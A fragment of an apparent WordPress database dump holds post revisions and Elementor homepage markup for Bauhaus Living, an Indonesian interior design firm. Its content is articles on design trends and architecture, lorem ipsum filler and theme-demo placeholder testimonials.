building techniques into interior spaces. Sustainability is not just a trend; it\'s becoming a fundamental aspect of interior design...</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>2. </strong>Smart Homes</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The future of interior design is undoubtedly connected to technology. Smart homes are becoming more prevalent, and interior designers are incorporating smart technology seamlessly into their designs. From voice-controlled lighting to integrated security systems, the interior spaces of the future will be both aesthetically pleasing and highly functional.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><br>Tentu, saya bisa membantu Anda membuat artikel untuk website perusahaan konsultan interior dengan judul \"WHAT IS THE FUTURE OF INTERIOR DESIGN?\" Berikut adalah contoh artikel yang bisa Anda gunakan sebagai referensi:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1 class=\"wp-block-heading\">WHAT IS THE FUTURE OF INTERIOR DESIGN?</h1>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Interior design is an ever-evolving field that constantly adapts to the changing needs and preferences of society. As we move into the future, several key trends and innovations are shaping the way we think about and approach interior design. In this article, we will explore some of the exciting developments that are likely to define the future of interior design.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">1. Sustainable Design</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>One of the most significant trends in interior design\'s future is a strong focus on sustainability. With increasing environmental concerns, designers are placing a greater emphasis on eco-friendly materials, energy-efficient designs, and sustainable practices. This means incorporating elements such as recycled materials, energy-efficient lighting, and green building techniques into interior spaces. Sustainability is not just a trend; it\'s becoming a fundamental aspect of interior design.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">2. Smart Homes</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The future of interior design is undoubtedly connected to technology. Smart homes are becoming more prevalent, and interior designers are incorporating smart technology seamlessly into their designs. From voice-controlled lighting to integrated security systems, the interior spaces of the future will be both aesthetically pleasing and highly functional.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">3. Biophilic Design</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Incorporating nature into interior spaces is another growing trend. Biophilic design, which emphasizes the connection between humans and nature, is gaining popularity. This can involve using natural materials like wood and stone, as well as incorporating elements like indoor gardens and living walls. Biophilic design not only enhances the aesthetics of a space but also promotes well-being and productivity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">4. Personalization and Customization</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Interior design is becoming increasingly personal. Clients want spaces that reflect their unique tastes and lifestyles. In the future, customization will play a significant role in interior design. Whether it\'s custom furniture, tailored color palettes, or personalized layouts, interior designers will need to cater to individual preferences to create truly one-of-a-kind spaces.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">6. Minimalism and Maximalism</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Design trends often swing between minimalism and maximalism, and the future will likely see a fusion of these two approaches. Some spaces may embrace the simplicity and clean lines of minimalism, while others will go all out with bold colors, patterns, and textures. This flexibility allows for a broader range of design possibilities to cater to diverse tastes.</p>\n<!-- /wp:paragraph -->','What is the future of interior design?','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','inherit','closed','closed','','2432-revision-v1','','','2023-09-25 10:16:14','2023-09-25 10:16:14','',2432,'https://bauhaus.futuremediatrix.com/?p=4958',0,'revision','',0),(4960,3,'2023-09-25 10:19:01','2023-09-25 10:19:01','<!-- wp:paragraph -->\n<p>Interior design is an ever-evolving field that constantly adapts to the changing needs and preferences of society. As we move into the future, several key trends and innovations are shaping the way we think about and approach interior design. In this article, we will explore some of the exciting developments that are likely to define the future of interior design.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Interior design is an ever-evolving field that constantly adapts to the changing needs and preferences of society. As we move into the future, several key trends and innovations are shaping the way we think about and approach interior design. In this article, we will explore some of the exciting developments that are likely to define the future of interior design. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">1. Sustainable Design</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>One of the most significant trends in interior design\'s future is a strong focus on sustainability. With increasing environmental concerns, designers are placing a greater emphasis on eco-friendly materials, energy-efficient designs, and sustainable practices. This means incorporating elements such as recycled materials, energy-efficient lighting, and green building techniques into interior spaces. Sustainability is not just a trend; it\'s becoming a fundamental aspect of interior design.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":230,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" class=\"wp-image-230\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":217,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" class=\"wp-image-217\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">2. Smart Homes</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The future of interior design is undoubtedly connected to technology. Smart homes are becoming more prevalent, and interior designers are incorporating smart technology seamlessly into their designs. From voice-controlled lighting to integrated security systems, the interior spaces of the future will be both aesthetically pleasing and highly functional.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">3. Biophilic Design</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Incorporating nature into interior spaces is another growing trend. Biophilic design, which emphasizes the connection between humans and nature, is gaining popularity. This can involve using natural materials like wood and stone, as well as incorporating elements like indoor gardens and living walls. Biophilic design not only enhances the aesthetics of a space but also promotes well-being and productivity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">4. Personalization and Customization</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Interior design is becoming increasingly personal. Clients want spaces that reflect their unique tastes and lifestyles. In the future, customization will play a significant role in interior design. Whether it\'s custom furniture, tailored color palettes, or personalized layouts, interior designers will need to cater to individual preferences to create truly one-of-a-kind spaces.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">6. Minimalism and Maximalism</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Design trends often swing between minimalism and maximalism, and the future will likely see a fusion of these two approaches. Some spaces may embrace the simplicity and clean lines of minimalism, while others will go all out with bold colors, patterns, and textures. This flexibility allows for a broader range of design possibilities to cater to diverse tastes.</p>\n<!-- /wp:paragraph -->','What is the future of interior design?','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','inherit','closed','closed','','2432-revision-v1','','','2023-09-25 10:19:01','2023-09-25 10:19:01','',2432,'https://bauhaus.futuremediatrix.com/?p=4960',0,'revision','',0),(4962,3,'2023-09-25 10:23:54','2023-09-25 10:23:54','<!-- wp:paragraph -->\n<p>Architecture is a captivating and creative field that involves designing and creating the spaces where we live, work, and play. It\'s a profession that merges art and science, aesthetics, and functionality. One question that often arises, especially among aspiring architects, is whether math plays a crucial role in architecture. Let\'s explore the relationship between math and architecture to better understand its significance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">The Basics: Geometry and Arithmetic</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>At its core, architecture does require a basic understanding of mathematics. Geometry is particularly important, as it deals with shapes, sizes, proportions, and angles—all fundamental aspects of architectural design. Architects use geometric principles to create balanced and visually pleasing structures. They calculate dimensions, layout designs, and ensure structural integrity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Arithmetic is another essential mathematical skill in architecture. It involves basic calculations for measurements, budgeting, and project planning. Architects must be able to work with numbers accurately to estimate costs, allocate resources, and meet project deadlines.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Structural Engineering and Calculations</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Mathematics becomes even more critical when it comes to structural engineering within architecture. Architects work closely with structural engineers to ensure that buildings are safe and stable. Engineers use complex mathematical calculations to determine load-bearing capacities, stress analysis, and the choice of materials. While architects may not perform these calculations themselves, they need to understand and communicate effectively with engineers to bring their designs to life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Computer-Aided Design (CAD)</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>In today\'s digital age, computer-aided design (CAD) software is a standard tool in architectural practice. CAD software relies heavily on mathematical algorithms to create precise and detailed architectural drawings. Architects use CAD to draft plans, design blueprints, and generate 3D models. Proficiency in CAD requires a solid grasp of mathematical concepts, as precise measurements and calculations are integral to the software\'s functionality.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Sustainable Design and Efficiency</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Mathematics also plays a role in sustainable architecture. Architects use mathematical modeling and analysis to optimize energy efficiency, reduce waste, and minimize environmental impact. Calculations involving insulation, solar orientation, and material usage contribute to creating eco-friendly and sustainable designs.</p>\n<!-- /wp:paragraph -->','Do you need math for architecture?','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','inherit','closed','closed','','2430-revision-v1','','','2023-09-25 10:23:54','2023-09-25 10:23:54','',2430,'https://bauhaus.futuremediatrix.com/?p=4962',0,'revision','',0),(4966,3,'2023-09-25 10:27:08','2023-09-25 10:27:08','<!-- wp:paragraph -->\n<p>Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text. </p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":230,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" class=\"wp-image-230\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":217,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" class=\"wp-image-217\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph -->\n<p>Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type simen book. It has survived not only five centuries, but also the leap into electronic typesetting.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Lorem Ipsum has been the industry\'s standard dummy text ever since</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. orem Ipsum has been the industry\'s standard dummy text ever since the when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into unchanged.</p>\n<!-- /wp:paragraph -->','High Quality, Effective & Inspiring Built Space','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','inherit','closed','closed','','1090-revision-v1','','','2023-09-25 10:27:08','2023-09-25 10:27:08','',1090,'https://bauhaus.futuremediatrix.com/?p=4966',0,'revision','',0),(4968,3,'2023-09-25 10:30:05','2023-09-25 10:30:05','<!-- wp:paragraph -->\n<p>Designing interior spaces that truly make a difference in people\'s lives is at the heart of what we do. At Bauhaus Living, we are committed to creating high-quality, effective, and inspiring built environments that leave a lasting impact. In this article, we\'ll explore what it means to craft spaces that elevate the human experience.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>Quality Matters</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Quality is a cornerstone of our approach to interior design. When we talk about quality in the context of built spaces, we are referring to the craftsmanship, materials, and attention to detail that go into every project. High-quality design and execution result in spaces that not only look stunning but also stand the test of time.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We source the finest materials and work with skilled artisans who share our commitment to excellence. This dedication to quality ensures that your interior spaces will not only be aesthetically pleasing but also durable and functional.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>Effectiveness through Functionality</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Effective interior design goes beyond aesthetics; it\'s about creating spaces that work seamlessly for their intended purposes. Whether it\'s a home, office, retail store, or hospitality venue, we understand the unique needs and goals of each project. Our designs are tailored to enhance functionality and flow, optimizing the use of space to meet the practical requirements of our clients.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We believe that effective design should make daily routines more efficient, improve productivity in the workplace, and enhance the overall experience of a space. Our team takes the time to understand your vision and objectives, ensuring that our designs not only meet but exceed your expectations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>Inspiration in Every Detail</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Inspiration is a powerful force in design. An inspiring space has the ability to uplift, motivate, and captivate. It\'s where creativity flourishes, and ideas come to life. Our interior designs are carefully curated to inspire, with attention paid to every detail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We believe that an inspiring built environment can positively impact the people who inhabit it. Whether it\'s through the use of color, texture, lighting, or unique design elements, our goal is to create spaces that leave a lasting impression and encourage creativity and innovation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>Collaboration and Vision</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The journey to creating high-quality, effective, and inspiring built spaces begins with collaboration. We work closely with our clients to understand their vision, preferences, and goals. Our team of experienced designers combines their expertise with your vision to bring concepts to reality.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We also collaborate with architects, contractors, and other professionals to ensure that every aspect of the project aligns with our commitment to quality, functionality, and inspiration.</p>\n<!-- /wp:paragraph -->','High Quality, Effective & Inspiring Built Space','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','inherit','closed','closed','','1090-revision-v1','','','2023-09-25 10:30:05','2023-09-25 10:30:05','',1090,'https://bauhaus.futuremediatrix.com/?p=4968',0,'revision','',0),(4969,3,'2023-09-25 10:42:07','2023-09-25 10:42:07','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														